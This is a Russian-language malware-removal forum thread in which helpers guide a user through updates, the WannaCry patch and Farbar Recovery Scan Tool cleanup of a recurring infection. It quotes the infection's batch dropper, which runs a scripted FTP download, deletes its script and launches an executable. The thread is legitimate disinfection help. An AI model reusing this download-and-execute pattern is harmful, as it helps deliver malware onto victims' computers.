Перейти к содержанию

Самовосстанавливающиеся вирус


Рекомендуемые сообщения

Опубликовано

Все началось с двух синих экранов за день,я сразу решил посмотреть дампы. На скринах все видно. Вчера сделал логи,если надо могу сделать сегодняшние. 
Как видите по скринам в карантине одни и те же файлы вируса,он после каждой перезагрузки их находит снова и снова,и их становится больше. Так же была создана учетная запись гость под паролем,я ее удаляю,ну после перезагрузки появляется снова. Есть подозрения на файловый вирус,которые сложно лечить.

post-46142-0-38656400-1496567176_thumb.png

post-46142-0-22292100-1496567195_thumb.png

post-46142-0-39274600-1496567248_thumb.png

post-46142-0-93284700-1496567265_thumb.png

CollectionLog-2017.06.03-23.17.zip

Опубликовано

Все обновления для системы и патч против WannaCry установлены?

Опубликовано

Все обновления для системы и патч против WannaCry установлены?

Для системы не знаю,ну патч я не знаю откуда установить. 

Опубликовано

 

 


Что по логам и по скринам скажете?
из-за того, что похоже вы никогда не обновляли свою систему у вас там куча дырок. В одну из них у вас вирус лезет и как следствие указанные проблемы. Желательно установите все обновления безопасности (а то возможно завтра другой вирус к вам залезет), а потом переделывайте логи. Дочистим остатки вируса. Пока есть дыра, лечить его бесполезно.
Опубликовано

 

Что по логам и по скринам скажете?

из-за того, что похоже вы никогда не обновляли свою систему у вас там куча дырок. В одну из них у вас вирус лезет и как следствие указанные проблемы. Желательно установите все обновления безопасности (а то возможно завтра другой вирус к вам залезет), а потом переделывайте логи. Дочистим остатки вируса. Пока есть дыра, лечить его бесполезно.

 

Счас так и сделаем

Все обновления для системы и патч против WannaCry установлены?

 

 

 
из-за того, что похоже вы никогда не обновляли свою систему у вас там куча дырок. В одну из них у вас вирус лезет и как следствие указанные проблемы. Желательно установите все обновления безопасности (а то возможно завтра другой вирус к вам залезет), а потом переделывайте логи. Дочистим остатки вируса. Пока есть дыра, лечить его бесполезно.

 

Поставил патч отдельно,потом обновления все поставил (см.скриншот). В мой компьютер висят до сих пор 4 диска. Логи новые сделал.

CollectionLog-2017.06.04-14.27.zip

post-46142-0-86907700-1496575837_thumb.png

Опубликовано

Скачайте Farbar Recovery Scan Tool NAAC5Ba.png и сохраните на Рабочем столе.

  • Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

2. Убедитесь, что в окне Optional Scan отмечены List BCD, Driver MD5 и 90 Days Files.

3munStB.png

3. Нажмите кнопку Scan.

4. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа.

5. Если программа была запущена в первый раз, также будет создан отчет (Addition.txt).

6. Отчеты, полученные в пп. 4 и 5, заархивируйте (в один архив) и прикрепите к сообщению.

Опубликовано

Содержимое файла C:\Windows\system32\b.bat процитируйте.

 

1. Откройте Блокнот и скопируйте в него приведенный ниже текст

CreateRestorePoint:
2017-06-04 01:15 - 2017-06-04 13:48 - 00000000 ___HD C:\Users\Все пользователи\vrytwvhkhl424
2017-06-04 01:15 - 2017-06-04 13:48 - 00000000 ___HD C:\ProgramData\vrytwvhkhl424
Reboot:
2. Нажмите ФайлСохранить как

3. Выберите папку, откуда была запущена утилита Farbar Recovery Scan Tool

4. Укажите Тип файлаВсе файлы (*.*)

5. Введите имя файла fixlist.txt и нажмите кнопку Сохранить

6. Запустите FRST, нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.

  • Обратите внимание, что будет выполнена перезагрузка компьютера.
Опубликовано

Содержимое файла C:\Windows\system32\b.bat процитируйте.

  

b.bat:

ftp.exe -s:a.tmp

ping -n 15 127.0.0.1

del a.tmp

c:\users\me.exe

 

 

Fixlog.txt

Опубликовано

c:\users\me.exe есть на компьютере?

Опубликовано

c:\users\me.exe есть на компьютере?

Вроде через поиск ничего такого не нашел. 

Папку с Frst удалю,а то там в карантине как раз файлы это вируса

Опубликовано

Проблема решена?

В принципе решена. Тему можно закрывать. 

Ноутбук может быть заражен,я с него файлы передавал,когда заражен компьютер был? 

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
×
×
  • Создать...